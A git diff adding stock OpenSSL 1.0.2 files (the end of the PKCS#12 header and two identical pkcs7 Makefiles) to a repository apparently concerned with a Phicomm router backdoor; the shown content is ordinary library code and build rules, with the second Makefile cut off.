+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_PKCS12_H
+# define HEADER_PKCS12_H
+
+# include <openssl/bio.h>
+# include <openssl/x509.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# define PKCS12_KEY_ID   1
+# define PKCS12_IV_ID    2
+# define PKCS12_MAC_ID   3
+
+/* Default iteration count */
+# ifndef PKCS12_DEFAULT_ITER
+#  define PKCS12_DEFAULT_ITER     PKCS5_DEFAULT_ITER
+# endif
+
+# define PKCS12_MAC_KEY_LENGTH 20
+
+# define PKCS12_SALT_LEN 8
+
+/* Uncomment out next line for unicode password and names, otherwise ASCII */
+
+/*
+ * #define PBE_UNICODE
+ */
+
+# ifdef PBE_UNICODE
+#  define PKCS12_key_gen PKCS12_key_gen_uni
+#  define PKCS12_add_friendlyname PKCS12_add_friendlyname_uni
+# else
+#  define PKCS12_key_gen PKCS12_key_gen_asc
+#  define PKCS12_add_friendlyname PKCS12_add_friendlyname_asc
+# endif
+
+/* MS key usage constants */
+
+# define KEY_EX  0x10
+# define KEY_SIG 0x80
+
+typedef struct {
+    X509_SIG *dinfo;
+    ASN1_OCTET_STRING *salt;
+    ASN1_INTEGER *iter;         /* defaults to 1 */
+} PKCS12_MAC_DATA;
+
+typedef struct {
+    ASN1_INTEGER *version;
+    PKCS12_MAC_DATA *mac;
+    PKCS7 *authsafes;
+} PKCS12;
+
+typedef struct {
+    ASN1_OBJECT *type;
+    union {
+        struct pkcs12_bag_st *bag; /* secret, crl and certbag */
+        struct pkcs8_priv_key_info_st *keybag; /* keybag */
+        X509_SIG *shkeybag;     /* shrouded key bag */
+        STACK_OF(PKCS12_SAFEBAG) *safes;
+        ASN1_TYPE *other;
+    } value;
+    STACK_OF(X509_ATTRIBUTE) *attrib;
+} PKCS12_SAFEBAG;
+
+DECLARE_STACK_OF(PKCS12_SAFEBAG)
+DECLARE_ASN1_SET_OF(PKCS12_SAFEBAG)
+DECLARE_PKCS12_STACK_OF(PKCS12_SAFEBAG)
+
+typedef struct pkcs12_bag_st {
+    ASN1_OBJECT *type;
+    union {
+        ASN1_OCTET_STRING *x509cert;
+        ASN1_OCTET_STRING *x509crl;
+        ASN1_OCTET_STRING *octet;
+        ASN1_IA5STRING *sdsicert;
+        ASN1_TYPE *other;       /* Secret or other bag */
+    } value;
+} PKCS12_BAGS;
+
+# define PKCS12_ERROR    0
+# define PKCS12_OK       1
+
+/* Compatibility macros */
+
+# define M_PKCS12_x5092certbag PKCS12_x5092certbag
+# define M_PKCS12_x509crl2certbag PKCS12_x509crl2certbag
+
+# define M_PKCS12_certbag2x509 PKCS12_certbag2x509
+# define M_PKCS12_certbag2x509crl PKCS12_certbag2x509crl
+
+# define M_PKCS12_unpack_p7data PKCS12_unpack_p7data
+# define M_PKCS12_pack_authsafes PKCS12_pack_authsafes
+# define M_PKCS12_unpack_authsafes PKCS12_unpack_authsafes
+# define M_PKCS12_unpack_p7encdata PKCS12_unpack_p7encdata
+
+# define M_PKCS12_decrypt_skey PKCS12_decrypt_skey
+# define M_PKCS8_decrypt PKCS8_decrypt
+
+# define M_PKCS12_bag_type(bg) OBJ_obj2nid((bg)->type)
+# define M_PKCS12_cert_bag_type(bg) OBJ_obj2nid((bg)->value.bag->type)
+# define M_PKCS12_crl_bag_type M_PKCS12_cert_bag_type
+
+# define PKCS12_get_attr(bag, attr_nid) \
+                         PKCS12_get_attr_gen(bag->attrib, attr_nid)
+
+# define PKCS8_get_attr(p8, attr_nid) \
+                PKCS12_get_attr_gen(p8->attributes, attr_nid)
+
+# define PKCS12_mac_present(p12) ((p12)->mac ? 1 : 0)
+
+PKCS12_SAFEBAG *PKCS12_x5092certbag(X509 *x509);
+PKCS12_SAFEBAG *PKCS12_x509crl2certbag(X509_CRL *crl);
+X509 *PKCS12_certbag2x509(PKCS12_SAFEBAG *bag);
+X509_CRL *PKCS12_certbag2x509crl(PKCS12_SAFEBAG *bag);
+
+PKCS12_SAFEBAG *PKCS12_item_pack_safebag(void *obj, const ASN1_ITEM *it,
+                                         int nid1, int nid2);
+PKCS12_SAFEBAG *PKCS12_MAKE_KEYBAG(PKCS8_PRIV_KEY_INFO *p8);
+PKCS8_PRIV_KEY_INFO *PKCS8_decrypt(X509_SIG *p8, const char *pass,
+                                   int passlen);
+PKCS8_PRIV_KEY_INFO *PKCS12_decrypt_skey(PKCS12_SAFEBAG *bag,
+                                         const char *pass, int passlen);
+X509_SIG *PKCS8_encrypt(int pbe_nid, const EVP_CIPHER *cipher,
+                        const char *pass, int passlen, unsigned char *salt,
+                        int saltlen, int iter, PKCS8_PRIV_KEY_INFO *p8);
+PKCS12_SAFEBAG *PKCS12_MAKE_SHKEYBAG(int pbe_nid, const char *pass,
+                                     int passlen, unsigned char *salt,
+                                     int saltlen, int iter,
+                                     PKCS8_PRIV_KEY_INFO *p8);
+PKCS7 *PKCS12_pack_p7data(STACK_OF(PKCS12_SAFEBAG) *sk);
+STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7data(PKCS7 *p7);
+PKCS7 *PKCS12_pack_p7encdata(int pbe_nid, const char *pass, int passlen,
+                             unsigned char *salt, int saltlen, int iter,
+                             STACK_OF(PKCS12_SAFEBAG) *bags);
+STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7encdata(PKCS7 *p7, const char *pass,
+                                                  int passlen);
+
+int PKCS12_pack_authsafes(PKCS12 *p12, STACK_OF(PKCS7) *safes);
+STACK_OF(PKCS7) *PKCS12_unpack_authsafes(PKCS12 *p12);
+
+int PKCS12_add_localkeyid(PKCS12_SAFEBAG *bag, unsigned char *name,
+                          int namelen);
+int PKCS12_add_friendlyname_asc(PKCS12_SAFEBAG *bag, const char *name,
+                                int namelen);
+int PKCS12_add_CSPName_asc(PKCS12_SAFEBAG *bag, const char *name,
+                           int namelen);
+int PKCS12_add_friendlyname_uni(PKCS12_SAFEBAG *bag,
+                                const unsigned char *name, int namelen);
+int PKCS8_add_keyusage(PKCS8_PRIV_KEY_INFO *p8, int usage);
+ASN1_TYPE *PKCS12_get_attr_gen(STACK_OF(X509_ATTRIBUTE) *attrs, int attr_nid);
+char *PKCS12_get_friendlyname(PKCS12_SAFEBAG *bag);
+unsigned char *PKCS12_pbe_crypt(X509_ALGOR *algor, const char *pass,
+                                int passlen, unsigned char *in, int inlen,
+                                unsigned char **data, int *datalen,
+                                int en_de);
+void *PKCS12_item_decrypt_d2i(X509_ALGOR *algor, const ASN1_ITEM *it,
+                              const char *pass, int passlen,
+                              ASN1_OCTET_STRING *oct, int zbuf);
+ASN1_OCTET_STRING *PKCS12_item_i2d_encrypt(X509_ALGOR *algor,
+                                           const ASN1_ITEM *it,
+                                           const char *pass, int passlen,
+                                           void *obj, int zbuf);
+PKCS12 *PKCS12_init(int mode);
+int PKCS12_key_gen_asc(const char *pass, int passlen, unsigned char *salt,
+                       int saltlen, int id, int iter, int n,
+                       unsigned char *out, const EVP_MD *md_type);
+int PKCS12_key_gen_uni(unsigned char *pass, int passlen, unsigned char *salt,
+                       int saltlen, int id, int iter, int n,
+                       unsigned char *out, const EVP_MD *md_type);
+int PKCS12_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
+                        ASN1_TYPE *param, const EVP_CIPHER *cipher,
+                        const EVP_MD *md_type, int en_de);
+int PKCS12_gen_mac(PKCS12 *p12, const char *pass, int passlen,
+                   unsigned char *mac, unsigned int *maclen);
+int PKCS12_verify_mac(PKCS12 *p12, const char *pass, int passlen);
+int PKCS12_set_mac(PKCS12 *p12, const char *pass, int passlen,
+                   unsigned char *salt, int saltlen, int iter,
+                   const EVP_MD *md_type);
+int PKCS12_setup_mac(PKCS12 *p12, int iter, unsigned char *salt,
+                     int saltlen, const EVP_MD *md_type);
+unsigned char *OPENSSL_asc2uni(const char *asc, int asclen,
+                               unsigned char **uni, int *unilen);
+char *OPENSSL_uni2asc(unsigned char *uni, int unilen);
+
+DECLARE_ASN1_FUNCTIONS(PKCS12)
+DECLARE_ASN1_FUNCTIONS(PKCS12_MAC_DATA)
+DECLARE_ASN1_FUNCTIONS(PKCS12_SAFEBAG)
+DECLARE_ASN1_FUNCTIONS(PKCS12_BAGS)
+
+DECLARE_ASN1_ITEM(PKCS12_SAFEBAGS)
+DECLARE_ASN1_ITEM(PKCS12_AUTHSAFES)
+
+void PKCS12_PBE_add(void);
+int PKCS12_parse(PKCS12 *p12, const char *pass, EVP_PKEY **pkey, X509 **cert,
+                 STACK_OF(X509) **ca);
+PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
+                      STACK_OF(X509) *ca, int nid_key, int nid_cert, int iter,
+                      int mac_iter, int keytype);
+
+PKCS12_SAFEBAG *PKCS12_add_cert(STACK_OF(PKCS12_SAFEBAG) **pbags, X509 *cert);
+PKCS12_SAFEBAG *PKCS12_add_key(STACK_OF(PKCS12_SAFEBAG) **pbags,
+                               EVP_PKEY *key, int key_usage, int iter,
+                               int key_nid, char *pass);
+int PKCS12_add_safe(STACK_OF(PKCS7) **psafes, STACK_OF(PKCS12_SAFEBAG) *bags,
+                    int safe_nid, int iter, char *pass);
+PKCS12 *PKCS12_add_safes(STACK_OF(PKCS7) *safes, int p7_nid);
+
+int i2d_PKCS12_bio(BIO *bp, PKCS12 *p12);
+int i2d_PKCS12_fp(FILE *fp, PKCS12 *p12);
+PKCS12 *d2i_PKCS12_bio(BIO *bp, PKCS12 **p12);
+PKCS12 *d2i_PKCS12_fp(FILE *fp, PKCS12 **p12);
+int PKCS12_newpass(PKCS12 *p12, char *oldpass, char *newpass);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_PKCS12_strings(void);
+
+/* Error codes for the PKCS12 functions. */
+
+/* Function codes. */
+# define PKCS12_F_PARSE_BAG                               129
+# define PKCS12_F_PARSE_BAGS                              103
+# define PKCS12_F_PKCS12_ADD_FRIENDLYNAME                 100
+# define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_ASC             127
+# define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_UNI             102
+# define PKCS12_F_PKCS12_ADD_LOCALKEYID                   104
+# define PKCS12_F_PKCS12_CREATE                           105
+# define PKCS12_F_PKCS12_GEN_MAC                          107
+# define PKCS12_F_PKCS12_INIT                             109
+# define PKCS12_F_PKCS12_ITEM_DECRYPT_D2I                 106
+# define PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT                 108
+# define PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG                117
+# define PKCS12_F_PKCS12_KEY_GEN_ASC                      110
+# define PKCS12_F_PKCS12_KEY_GEN_UNI                      111
+# define PKCS12_F_PKCS12_MAKE_KEYBAG                      112
+# define PKCS12_F_PKCS12_MAKE_SHKEYBAG                    113
+# define PKCS12_F_PKCS12_NEWPASS                          128
+# define PKCS12_F_PKCS12_PACK_P7DATA                      114
+# define PKCS12_F_PKCS12_PACK_P7ENCDATA                   115
+# define PKCS12_F_PKCS12_PARSE                            118
+# define PKCS12_F_PKCS12_PBE_CRYPT                        119
+# define PKCS12_F_PKCS12_PBE_KEYIVGEN                     120
+# define PKCS12_F_PKCS12_SETUP_MAC                        122
+# define PKCS12_F_PKCS12_SET_MAC                          123
+# define PKCS12_F_PKCS12_UNPACK_AUTHSAFES                 130
+# define PKCS12_F_PKCS12_UNPACK_P7DATA                    131
+# define PKCS12_F_PKCS12_VERIFY_MAC                       126
+# define PKCS12_F_PKCS8_ADD_KEYUSAGE                      124
+# define PKCS12_F_PKCS8_ENCRYPT                           125
+
+/* Reason codes. */
+# define PKCS12_R_CANT_PACK_STRUCTURE                     100
+# define PKCS12_R_CONTENT_TYPE_NOT_DATA                   121
+# define PKCS12_R_DECODE_ERROR                            101
+# define PKCS12_R_ENCODE_ERROR                            102
+# define PKCS12_R_ENCRYPT_ERROR                           103
+# define PKCS12_R_ERROR_SETTING_ENCRYPTED_DATA_TYPE       120
+# define PKCS12_R_INVALID_NULL_ARGUMENT                   104
+# define PKCS12_R_INVALID_NULL_PKCS12_POINTER             105
+# define PKCS12_R_IV_GEN_ERROR                            106
+# define PKCS12_R_KEY_GEN_ERROR                           107
+# define PKCS12_R_MAC_ABSENT                              108
+# define PKCS12_R_MAC_GENERATION_ERROR                    109
+# define PKCS12_R_MAC_SETUP_ERROR                         110
+# define PKCS12_R_MAC_STRING_SET_ERROR                    111
+# define PKCS12_R_MAC_VERIFY_ERROR                        112
+# define PKCS12_R_MAC_VERIFY_FAILURE                      113
+# define PKCS12_R_PARSE_ERROR                             114
+# define PKCS12_R_PKCS12_ALGOR_CIPHERINIT_ERROR           115
+# define PKCS12_R_PKCS12_CIPHERFINAL_ERROR                116
+# define PKCS12_R_PKCS12_PBE_CRYPT_ERROR                  117
+# define PKCS12_R_UNKNOWN_DIGEST_ALGORITHM                118
+# define PKCS12_R_UNSUPPORTED_PKCS12_MODE                 119
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile
new file mode 100644
index 0000000..64ef95b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile
@@ -0,0 +1,171 @@
+#
+# OpenSSL/crypto/pkcs7/Makefile
+#
+
+DIR=	pkcs7
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	pk7_asn1.c pk7_lib.c pkcs7err.c pk7_doit.c pk7_smime.c pk7_attr.c \
+	pk7_mime.c bio_pk7.c
+LIBOBJ= pk7_asn1.o pk7_lib.o pkcs7err.o pk7_doit.o pk7_smime.o pk7_attr.o \
+	pk7_mime.o bio_pk7.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs7.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_pk7.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_pk7.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_pk7.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_pk7.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+bio_pk7.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_pk7.o: ../../include/openssl/symhacks.h bio_pk7.c
+pk7_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+pk7_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk7_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_asn1.o: ../../include/openssl/opensslconf.h
+pk7_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_asn1.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pk7_asn1.c
+pk7_attr.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+pk7_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_attr.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pk7_attr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_attr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_attr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_attr.o: ../../include/openssl/x509_vfy.h pk7_attr.c
+pk7_doit.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_doit.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_doit.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_doit.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_doit.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_doit.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_doit.o: ../../include/openssl/opensslconf.h
+pk7_doit.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_doit.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_doit.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_doit.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_doit.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_doit.o: ../../include/openssl/x509v3.h ../cryptlib.h pk7_doit.c
+pk7_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pk7_lib.o: pk7_lib.c
+pk7_mime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_mime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_mime.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_mime.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_mime.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_mime.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_mime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_mime.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_mime.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_mime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_mime.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_mime.o: ../cryptlib.h pk7_mime.c
+pk7_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_smime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_smime.o: ../../include/openssl/opensslconf.h
+pk7_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pk7_smime.o: ../cryptlib.h pk7_smime.c
+pkcs7err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pkcs7err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pkcs7err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+pkcs7err.o: ../../include/openssl/opensslconf.h
+pkcs7err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pkcs7err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pkcs7err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pkcs7err.o: pkcs7err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.bak
new file mode 100644
index 0000000..64ef95b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.bak
@@ -0,0 +1,171 @@
+#
+# OpenSSL/crypto/pkcs7/Makefile
+#
+
+DIR=	pkcs7
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	pk7_asn1.c pk7_lib.c pkcs7err.c pk7_doit.c pk7_smime.c pk7_attr.c \
+	pk7_mime.c bio_pk7.c
+LIBOBJ= pk7_asn1.o pk7_lib.o pkcs7err.o pk7_doit.o pk7_smime.o pk7_attr.o \
+	pk7_mime.o bio_pk7.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs7.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_pk7.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_pk7.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_pk7.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_pk7.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+bio_pk7.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_pk7.o: ../../include/openssl/symhacks.h bio_pk7.c
+pk7_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+pk7_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk7_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_asn1.o: ../../include/openssl/opensslconf.h
+pk7_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_asn1.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pk7_asn1.c
+pk7_attr.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+pk7_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_attr.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pk7_attr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_attr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_attr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_attr.o: ../../include/openssl/x509_vfy.h pk7_attr.c
+pk7_doit.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_doit.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_doit.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_doit.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_doit.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_doit.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_doit.o: ../../include/openssl/opensslconf.h
+pk7_doit.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
